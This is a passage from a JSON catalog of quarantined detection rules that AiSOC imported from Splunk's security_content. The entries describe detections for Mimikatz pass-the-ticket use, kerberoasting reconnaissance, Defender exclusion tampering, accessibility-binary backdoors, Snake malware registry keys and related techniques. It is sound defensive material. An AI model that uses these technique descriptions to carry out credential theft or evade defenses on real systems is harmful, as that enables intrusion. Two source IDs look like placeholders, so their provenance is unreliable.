behavior is significant for a SOC as it could allow an attacker to gain shell access to the container, potentially leading to further compromise of the Kubernetes cluster. 
If confirmed malicious, this activity could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks, severely compromising the cluster's security and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12345678-abcd-1234-ef00-1234567890ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___shell_execution.yml" } }, { "id": "splunk-security-content-1234abcd-5678-90ef-1234-56789abcdef0", "type": "detection", "name": "Windows AppX Deployment Package Installation Success", "description": "This analytic detects successful MSIX/AppX package installations on Windows systems by monitoring EventID 854 in the Microsoft-Windows-AppXDeployment-Server/Operational log. This event is generated when an MSIX/AppX package has been successfully installed on a system. 
While most package installations are legitimate, monitoring these events can help identify unauthorized or suspicious package installations, especially when correlated with other events such as unsigned package installations (EventID 603 with Flags=8388608) or full trust package installations (EventID 400 with HasFullTrust=true).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-appx-deployment-package-installation-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1234abcd-5678-90ef-1234-56789abcdef0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_appx_deployment_package_installation_success.yml" } }, { "id": "splunk-security-content-12491419-1a6f-4af4-afc3-4e2052f0610e", "type": "detection", "name": "Windows SubInAcl Execution", "description": "The following analytic detects the execution of the SubInAcl utility. SubInAcl is a legacy Windows Resource Kit tool from the Windows 2003 era, used to manipulate security descriptors of securable objects. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving the \"SubInAcl.exe\" binary. This activity can be significant because the utility should be rarely found on modern Windows machines, which means any execution could potentially be considered suspicious. 
If confirmed malicious, this could allow an attacker to blind defenses by tampering with EventLog ACLs or modifying the access to a previously denied resource.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-subinacl-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12491419-1a6f-4af4-afc3-4e2052f0610e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_subinacl_execution.yml" } }, { "id": "splunk-security-content-125f96f9-6f34-418b-b868-c4a8d7fb865f", "type": "detection", "name": "Windows NetSupport RMM DLL Loaded By Uncommon Process", "description": "The following analytic detects the loading of specific dynamic-link libraries (DLLs) associated with the NetSupport Remote Manager (RMM) tool by any process on a Windows system.\nModules such as CryptPak.dll, HTCTL32.DLL, IPCTL32.DLL, keyshowhook.dll, pcicapi.DLL, PCICL32.DLL, and TCCTL32.DLL, are integral to NetSupport's functionality.\nThis detection is particularly valuable when these modules are loaded by processes running from unusual directories (e.g., Downloads, ProgramData, or user-specific folders) rather than the legitimate Program Files installation path, or by executables that have been renamed but retain the internal \"client32\" identifier.\nThis helps to identify instances where the legitimate NetSupport tool is being misused by adversaries as a Remote Access Trojan (RAT).", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-netsupport-rmm-dll-loaded-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "125f96f9-6f34-418b-b868-c4a8d7fb865f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_netsupport_rmm_dll_loaded_by_uncommon_process.yml" } }, { "id": "splunk-security-content-127c8d08-25ff-11ec-9223-acde48001122", "type": "detection", "name": "Malicious InProcServer32 Modification", "description": "The following analytic detects a process modifying the registry with a known malicious CLSID under InProcServer32. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications within the HKLM or HKCU Software Classes CLSID paths. This activity is significant as it may indicate an attempt to load a malicious DLL, potentially leading to code execution. 
If confirmed malicious, this could allow an attacker to persist in the environment, execute arbitrary code, or escalate privileges, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-inprocserver32-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "127c8d08-25ff-11ec-9223-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_inprocserver32_modification.yml" } }, { "id": "splunk-security-content-1297fb80-f42a-4b4a-9c8a-88c066237cf6", "type": "detection", "name": "Schtasks scheduling job on remote system", "description": "The following analytic detects the use of 'schtasks.exe' to create a scheduled task on a remote system, indicating potential lateral movement or remote code execution. It leverages process data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line arguments and flags. This activity is significant as it may signify an adversary's attempt to persist or execute code remotely. 
If confirmed malicious, this could allow attackers to maintain access, execute arbitrary commands, or further infiltrate the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schtasks-scheduling-job-on-remote-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1297fb80-f42a-4b4a-9c8a-88c066237cf6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schtasks_scheduling_job_on_remote_system.yml" } }, { "id": "splunk-security-content-1297fb80-f42a-4b4a-9c8a-88c066437cf6", "type": "detection", "name": "Schtasks used for forcing a reboot", "description": "The following analytic detects the use of 'schtasks.exe' to schedule forced system reboots using the 'shutdown' and '/create' flags. It leverages endpoint process data to identify instances where these specific command-line arguments are used. This activity is significant because it may indicate an adversary attempting to disrupt operations or force a reboot to execute further malicious actions. 
If confirmed malicious, this could lead to system downtime, potential data loss, and provide an attacker with an opportunity to execute additional payloads or evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schtasks-used-for-forcing-a-reboot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1297fb80-f42a-4b4a-9c8a-88c066437cf6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schtasks_used_for_forcing_a_reboot.yml" } }, { "id": "splunk-security-content-12a23592-e3da-4344-8545-205d3290647c", "type": "detection", "name": "O365 Block User Consent For Risky Apps Disabled", "description": "The following analytic detects when the \"risk-based step-up consent\" security setting in Microsoft 365 is disabled. It monitors Azure Active Directory logs for the \"Update authorization policy\" operation, specifically changes to the \"AllowUserConsentForRiskyApps\" setting. This activity is significant because disabling this feature can expose the organization to OAuth phishing threats, allowing users to grant consent to malicious applications. 
If confirmed malicious, attackers could gain unauthorized access to user data and sensitive information, leading to data breaches and further compromise within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-block-user-consent-for-risky-apps-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12a23592-e3da-4344-8545-205d3290647c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_block_user_consent_for_risky_apps_disabled.yml" } }, { "id": "splunk-security-content-12bdaa0b-3c59-4489-aae1-bff6d67746ef", "type": "detection", "name": "Windows Modify Registry ProxyServer", "description": "The following analytic detects modifications to the Windows registry key for setting up a proxy server. It leverages data from the Endpoint.Registry datamodel, focusing on changes to the \"Internet Settings\\\\ProxyServer\" registry path. This activity is significant as it can indicate malware or adversaries configuring a proxy to facilitate unauthorized communication with Command and Control (C2) servers. 
If confirmed malicious, this could allow attackers to establish persistent, covert channels for data exfiltration or further exploitation of the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-proxyserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12bdaa0b-3c59-4489-aae1-bff6d67746ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_proxyserver.yml" } }, { "id": "splunk-security-content-12c80db8-ef62-4456-92df-b23e1b3219f6", "type": "detection", "name": "Windows Enable Win32 ScheduledJob via Registry", "description": "The following analytic detects the creation of a new DWORD value named \"EnableAt\" in the registry path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\". This modification enables the use of the at.exe or wmi Win32_ScheduledJob commands to add scheduled tasks on a Windows endpoint. The detection leverages registry event data from the Endpoint datamodel. This activity is significant because it may indicate that an attacker is enabling the ability to schedule tasks, potentially to execute malicious code at specific times or intervals. 
If confirmed malicious, this could allow persistent code execution on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-enable-win32-scheduledjob-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12c80db8-ef62-4456-92df-b23e1b3219f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml" } }, { "id": "splunk-security-content-13243068-2d38-11ec-8908-acde48001122", "type": "detection", "name": "ServicePrincipalNames Discovery with PowerShell", "description": "The following analytic detects the use of `powershell.exe` to query the domain for Service Principal Names (SPNs) using Script Block Logging EventCode 4104. It identifies the use of the KerberosRequestorSecurityToken class within the script block, which is equivalent to using setspn.exe. This activity is significant as it often precedes kerberoasting or silver ticket attacks, which can lead to credential theft. 
If confirmed malicious, attackers could leverage this information to escalate privileges or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/serviceprincipalnames-discovery-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13243068-2d38-11ec-8908-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/serviceprincipalnames_discovery_with_powershell.yml" } }, { "id": "splunk-security-content-13395a44-4dd9-11ec-9df7-acde48001122", "type": "detection", "name": "Windows Defender Exclusion Registry Entry", "description": "The following analytic detects modifications to the Windows Defender exclusion registry entries. It leverages endpoint registry data to identify changes in the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\*\". This activity is significant because adversaries often modify these entries to bypass Windows Defender, allowing malicious code to execute without detection. 
If confirmed malicious, this behavior could enable attackers to evade antivirus defenses, maintain persistence, and execute further malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-exclusion-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13395a44-4dd9-11ec-9df7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_exclusion_registry_entry.yml" } }, { "id": "splunk-security-content-13435b55-afd8-46d4-9045-7d5457f430a5", "type": "detection", "name": "Microsoft Defender Incident Alerts", "description": "The following analytic leverages alerts from Microsoft Defender O365 Incidents. This query aggregates and summarizes all alerts from Microsoft Defender O365 Incidents, providing details such as the destination, file name, severity, process command line, IP address, registry key, signature, description, unique id, and timestamps. This detection is not intended to detect new activity from raw data, but leverages Microsoft-provided alerts to be correlated with other data as part of risk-based alerting. The data contained in the alert is mapped not only to the risk object, but also the threat object. This detection filters out evidence that has a verdict of clean from Microsoft. 
It dynamically maps the MITRE technique at search time to auto populate the annotation field with the value provided in the alert. It also uses a static mapping to set the risk score based on the severity of the alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-defender-incident-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13435b55-afd8-46d4-9045-7d5457f430a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/microsoft_defender_incident_alerts.yml" } }, { "id": "splunk-security-content-1347b9e8-2daa-4a6f-be73-b421d3d9e268", "type": "detection", "name": "Azure AD User Enabled And Password Reset", "description": "The following analytic detects an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. It uses Azure Active Directory events to identify this sequence of actions. This activity is significant because it may indicate an adversary with administrative access attempting to establish a backdoor identity within the Azure AD tenant. 
If confirmed malicious, this could allow the attacker to maintain persistent access, escalate privileges, and potentially exfiltrate sensitive information from the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-enabled-and-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1347b9e8-2daa-4a6f-be73-b421d3d9e268", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_enabled_and_password_reset.yml" } }, { "id": "splunk-security-content-134da869-e264-4a8f-8d7e-fcd0ec88f301", "type": "detection", "name": "Monitor Web Traffic For Brand Abuse", "description": "The following analytic identifies web requests to domains that closely resemble your monitored brand's domain, indicating potential brand abuse. It leverages data from web traffic sources, such as web proxies or network traffic analysis tools, and cross-references these with known domain permutations generated by the \"ESCU - DNSTwist Domain Names\" search. This activity is significant as it can indicate phishing attempts or other malicious activities targeting your brand. 
If confirmed malicious, attackers could deceive users, steal credentials, or distribute malware, leading to significant reputational and financial damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/monitor-web-traffic-for-brand-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "134da869-e264-4a8f-8d7e-fcd0ec88f301", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/monitor_web_traffic_for_brand_abuse.yml" } }, { "id": "splunk-security-content-1379d2b8-0f18-11ec-8ca3-acde48001122", "type": "detection", "name": "Auto Admin Logon Registry Entry", "description": "The following analytic detects a suspicious registry modification that enables auto admin logon on a host. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"AutoAdminLogon\" value within the \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\" registry path. This activity is significant because it was observed in BlackMatter ransomware attacks to maintain access after a safe mode reboot, facilitating further encryption. 
If confirmed malicious, this could allow attackers to automatically log in and continue their operations, potentially leading to widespread network encryption and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/auto-admin-logon-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1379d2b8-0f18-11ec-8ca3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/auto_admin_logon_registry_entry.yml" } }, { "id": "splunk-security-content-13bbd574-83ac-11ec-99d4-acde48001122", "type": "detection", "name": "Mimikatz PassTheTicket CommandLine Parameters", "description": "The following analytic detects the use of Mimikatz command line parameters associated with pass-the-ticket attacks. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns related to Kerberos ticket manipulation. This activity is significant because pass-the-ticket attacks allow adversaries to move laterally within an environment using stolen Kerberos tickets, bypassing normal access controls. 
If confirmed malicious, this could enable attackers to escalate privileges, access sensitive information, and maintain persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mimikatz-passtheticket-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13bbd574-83ac-11ec-99d4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml" } }, { "id": "splunk-security-content-13c2f6c3-10c5-4deb-9ba1-7c4460ebe4ae", "type": "detection", "name": "Overwriting Accessibility Binaries", "description": "The following analytic detects modifications to Windows accessibility binaries such as sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe, and AtBroker.exe. It leverages filesystem activity data from the Endpoint.Filesystem data model to identify changes to these specific files. This activity is significant because adversaries can exploit these binaries to gain unauthorized access or execute commands without logging in. 
If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized system access and further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/overwriting-accessibility-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13c2f6c3-10c5-4deb-9ba1-7c4460ebe4ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/overwriting_accessibility_binaries.yml" } }, { "id": "splunk-security-content-13cf8b79-805d-443c-bf52-f55bd7610dfd", "type": "detection", "name": "Windows Snake Malware Registry Modification wav OpenWithProgIds", "description": "The following analytic identifies modifications to the registry path .wav\\\\OpenWithProgIds, associated with the Snake Malware campaign. It leverages data from the Endpoint.Registry datamodel to detect changes in this specific registry location. This activity is significant because Snake's WerFault.exe uses this registry path to decrypt an encrypted blob containing critical components like the AES key, IV, and paths for its kernel driver and loader. 
If confirmed malicious, this could allow the attacker to load and execute Snake's kernel driver, leading to potential system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-registry-modification-wav-openwithprogids.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13cf8b79-805d-443c-bf52-f55bd7610dfd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml" } }, { "id": "splunk-security-content-13f081d6-7052-428a-bbb0-892c79ca7c65", "type": "detection", "name": "Kubernetes newly seen TCP edge", "description": "The following analytic identifies newly seen TCP communication between source and destination workload pairs within a Kubernetes cluster. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares network activity over the last hour with the past 30 days to spot new inter-workload communications. This is significant as new connections can indicate changes in application behavior or potential security threats. 
If malicious, unauthorized connections could lead to data breaches, privilege escalation, lateral movement, or disruption of critical services, compromising the application's integrity, availability, and confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-newly-seen-tcp-edge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13f081d6-7052-428a-bbb0-892c79ca7c65", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_newly_seen_tcp_edge.yml" } }, { "id": "splunk-security-content-1400624a-d42d-484d-8843-e6753e6e3645", "type": "detection", "name": "Detect Computer Changed with Anonymous Account", "description": "The following analytic detects changes to computer accounts using an anonymous logon.\nIt leverages Windows Security Event Code 4742 (Computer Change) with a SubjectUserName value of \"ANONYMOUS LOGON\".\nThis activity can be significant because anonymous logons should not typically be modifying computer accounts, indicating potential unauthorized access or misconfiguration.\nIf confirmed malicious, this could allow an attacker to alter computer accounts, potentially leading to privilege escalation or persistent access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-computer-changed-with-anonymous-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1400624a-d42d-484d-8843-e6753e6e3645", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_computer_changed_with_anonymous_account.yml" } }, { "id": "splunk-security-content-140504ae-5fe2-4d65-b2bc-a211813fbca6", "type": "detection", "name": "Okta ThreatInsight Threat Detected", "description": "The following analytic identifies threats detected by Okta ThreatInsight, such as password spraying, login failures, and high counts of unknown user login attempts. It leverages Okta Identity Management logs, specifically focusing on security.threat.detected events. This activity is significant for a SOC as it highlights potential unauthorized access attempts and credential-based attacks. 
If confirmed malicious, these activities could lead to unauthorized access, data breaches, and further exploitation of compromised accounts, posing a significant risk to the organization's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-threatinsight-threat-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "140504ae-5fe2-4d65-b2bc-a211813fbca6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_threatinsight_threat_detected.yml" } }, { "id": "splunk-security-content-141e7fca-a9f0-40fd-a539-9aac8be41f1b", "type": "detection", "name": "Windows Odbcconf Load DLL", "description": "The following analytic detects the execution of odbcconf.exe with the regsvr action to load a DLL. This is identified by monitoring command-line arguments in process creation logs from Endpoint Detection and Response (EDR) agents. This activity is significant as it may indicate an attempt to execute arbitrary code via DLL loading, a common technique used in various attack vectors. 
If confirmed malicious, this could allow an attacker to execute code with the privileges of the odbcconf.exe process, potentially leading to system compromise or further lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-odbcconf-load-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "141e7fca-a9f0-40fd-a539-9aac8be41f1b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_odbcconf_load_dll.yml" } }, { "id": "splunk-security-content-1435475e-2128-4417-a34f-59770733b0d5", "type": "detection", "name": "O365 Mailbox Folder Read Permission Assigned", "description": "The following analytic identifies instances where read permissions are assigned to mailbox folders within an Office 365 environment. It leverages the `o365_management_activity` data source, specifically monitoring the `ModifyFolderPermissions` and `AddFolderPermissions` operations, while excluding Calendar, Contacts, and PersonMetadata objects. This activity is significant as unauthorized read permissions can lead to data exposure and potential information leakage. 
